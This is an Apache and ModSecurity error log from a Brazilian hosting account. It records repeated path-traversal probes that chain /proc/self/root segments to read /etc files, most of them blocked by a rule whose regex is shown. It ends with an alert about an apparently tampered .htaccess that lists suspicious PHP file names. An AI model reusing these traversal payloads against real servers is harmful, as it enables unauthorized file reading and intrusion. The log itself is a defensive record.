[Tue Mar 17 20:38:33.402839 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:36962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl-ew_le52K8_3pV1xxAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:34.141807 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59654] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:38:34.845680 2026] [:error] [pid 25836:tid 140411699963648] [client 74.7.241.31:36972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl-oh-PF_25v4hFRCPmAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:36.379872 2026] [:error] [pid 25836:tid 140411540502272] [client 74.7.241.31:36982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl_Ih-PF_25v4hFRCPmQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:37.691732 2026] [:error] [pid 25836:tid 140411557287680] [client 74.7.241.31:36982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl_Yh-PF_25v4hFRCPmwAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:39.364069 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:57156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnl_xj0p0SRWAqcjGGfCgAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:38:55.126334 2026] [proxy_fcgi:error] [pid 29151:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60090] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:38:59.855917 2026] [mime_magic:error] [pid 17653:tid 140411683178240] (70014)End of file found: [client 74.7.243.128:36172] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/lib
[Tue Mar 17 20:39:16.118581 2026] [proxy_fcgi:error] [pid 16449:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60410] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:39:17.191676 2026] [:error] [pid 11088:tid 140411683178240] [client 74.7.241.31:40340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmJWmqtCojLHvu5cKOdQAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:39:19.618944 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.241.31:48400] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmJ3Ik7brgkOH-rIWx3gAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:39:21.001303 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.241.31:48412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmKBj0p0SRWAqcjGGfDwAAAwk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:39:38.122326 2026] [proxy_fcgi:error] [pid 17653:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:60762] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:39:44.337992 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:48418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmQPPqhzTj3BvfDX-tiwAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:39:57.762567 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:44756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmTew_le52K8_3pV1x6gAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:39:58.606627 2026] [mime_magic:error] [pid 11816:tid 140411725141760] (70014)End of file found: [client 74.7.243.128:60498] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/lib/rpm/platform
[Tue Mar 17 20:39:59.101871 2026] [proxy_fcgi:error] [pid 11088:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:32796] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:39:59.542702 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.241.31:44758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmT9Y0UrI5A3LftIwk3gAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:00.950935 2026] [:error] [pid 16449:tid 140411548894976] [client 74.7.241.31:44772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmUEeQbjTSjgbmHFr1yAAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:04.921659 2026] [:error] [pid 2598:tid 140411649607424] [client 74.7.241.31:44786] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmVBj0p0SRWAqcjGGfFwAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:06.681918 2026] [:error] [pid 16449:tid 140411582465792] [client 74.7.241.31:44796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmVkeQbjTSjgbmHFr1zQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:20.141789 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33086] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:40:21.499050 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:39534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmZeyqAr6etmhZHNpMKQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:25.604851 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:39536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmaeyqAr6etmhZHNpMMQAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:27.371181 2026] [:error] [pid 6296:tid 140411725141760] [client 74.7.241.31:59144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnma3Ik7brgkOH-rIWx4QAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:28.754097 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:59146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmbNa6ubjKNq_cu4Yr_gAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:42.125793 2026] [proxy_fcgi:error] [pid 11088:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33416] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:40:43.455619 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:39316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnme9a6ubjKNq_cu4YsBgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:44.922200 2026] [:error] [pid 11088:tid 140411691570944] [client 74.7.241.31:39330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnmfGmqtCojLHvu5cKOfQAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:40:45.633819 2026] [core:alert] [pid 17653:tid 140411699963648] [client 74.7.243.128:56458] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </IfModule>custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|txets.php)$'> without matching 